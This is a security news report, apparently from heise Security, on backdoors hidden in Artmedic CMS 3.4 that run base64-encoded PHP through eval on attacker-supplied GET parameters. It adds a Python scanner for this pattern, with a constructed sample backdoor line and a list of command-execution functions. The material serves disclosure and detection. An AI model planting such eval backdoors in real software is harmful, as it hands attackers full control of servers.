Backdoor in Artmedic CMS
Several backdoors are hidden within the code of the Artmedic content management systems; they could be used by attackers to gain complete control of the server. The set-up script also sends an e-mail with the name of the compromised server to an address in Russia.
At least three places in the PHP code of the CMS contain statements of the following form:
$template1 = 'aWYoJF9HR...';
The cryptic, base64-encoded string is decoded, and the resulting commands are executed via eval. In other words, the PHP code that is executed evaluates the GET parameters include, cmd and php. By requesting specially crafted URLs, an attacker can inject arbitrary code and execute arbitrary commands on the server.
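As an added illustration (not code from the article or from Artmedic), the following Python script shows how a site operator can check a PHP tree for exactly this pattern: a long base64 literal that is later fed to eval, whether directly as eval(base64_decode($var)), through an intermediate variable, or as an inline literal. It decodes each candidate and reports which suspicious tokens (request superglobals, eval, include and command-execution functions) the decoded text contains. The sample PHP file, its payload and the token list are constructed for this example and are assumptions, not Artmedic's real code. For reference, the prefix quoted above, aWYoJF9HR, is the base64 encoding of the text if($_G, which is consistent with the description.

```python
import base64
import re

# Tokens in a decoded payload that warrant a closer look.
# Assumption: an illustrative list, not a complete one.
SUSPICIOUS_TOKENS = (
    "$_GET", "$_POST", "$_REQUEST", "$_COOKIE",
    "eval(", "system(", "exec(", "passthru(", "shell_exec(", "include(",
)

# A variable holding a long base64 literal, e.g.  $template1 = 'aWYoJF9HR...';
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*['\"]([A-Za-z0-9+/=]{40,})['\"]\s*;")
# $decoded = base64_decode($encoded);
ALIAS_RE = re.compile(r"\$(\w+)\s*=\s*base64_decode\s*\(\s*\$(\w+)\s*\)\s*;")
# eval(base64_decode($var));
EVAL_DECODE_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*\$(\w+)\s*\)\s*\)")
# eval($var);
EVAL_VAR_RE = re.compile(r"eval\s*\(\s*\$(\w+)\s*\)")
# eval(base64_decode('...'));
EVAL_LITERAL_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")


def decode_b64(text):
    """Strictly decode a base64 literal; None if it is not valid base64 or UTF-8."""
    try:
        return base64.b64decode(text, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def assess(label, b64):
    """Decode one candidate and list the suspicious tokens it contains."""
    decoded = decode_b64(b64)
    if decoded is None:
        return None
    return {
        "source": label,
        "decoded": decoded,
        "indicators": [t for t in SUSPICIOUS_TOKENS if t in decoded],
    }


def scan_php(source):
    """Find base64 literals that reach eval in PHP source and report what they decode to."""
    literals = dict(ASSIGN_RE.findall(source))                     # name -> base64 text
    aliases = {dst: src for dst, src in ALIAS_RE.findall(source)}  # decoded var -> encoded var
    findings = []

    # eval(base64_decode($template1))
    for name in EVAL_DECODE_RE.findall(source):
        if name in literals:
            findings.append(assess("$" + name, literals[name]))

    # $code = base64_decode($template1); eval($code);
    for name in EVAL_VAR_RE.findall(source):
        origin = aliases.get(name)
        if origin in literals:
            findings.append(assess("$" + name + " <- $" + origin, literals[origin]))

    # eval(base64_decode('...')) with the literal inline
    for b64 in EVAL_LITERAL_RE.findall(source):
        findings.append(assess("<literal>", b64))

    # Only report payloads that decoded and contain at least one indicator.
    return [f for f in findings if f is not None and f["indicators"]]


# Constructed sample mirroring the pattern the article describes. The payload
# below is an example written for this illustration, not Artmedic's real code.
PAYLOAD = "if($_GET['include']) include($_GET['include']);"
PAYLOAD_B64 = base64.b64encode(PAYLOAD.encode()).decode()
BENIGN_B64 = base64.b64encode(b"Hello, world! This is a long but harmless string.").decode()

SAMPLE_PHP = (
    "<?php\n"
    "$title = 'Welcome';\n"
    "$template1 = '" + PAYLOAD_B64 + "';\n"
    "eval(base64_decode($template1));\n"
    "$banner = '" + BENIGN_B64 + "';\n"   # long base64 literal, but never eval'd
    "echo base64_decode($banner);\n"
    "?>\n"
)

if __name__ == "__main__":
    for finding in scan_php(SAMPLE_PHP):
        print(finding["source"], "->", finding["indicators"])
        print("   decoded:", finding["decoded"])
```

Run over every .php file under the web root and treat any hit as a file to be compared against a known-good copy of the distribution, since a legitimate template rarely needs to be stored as base64 and executed with eval.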
The affected files are contained in the current version 3.4, which is available for download and dated May 2; that date, however, may have been manipulated. Other versions may also be affected. So far, the makers of Artmedic have not responded to inquiries by heise Security. Users who run Artmedic on their sites are advised to take these sites offline immediately and check their servers very carefully for any traces left by unwanted visitors.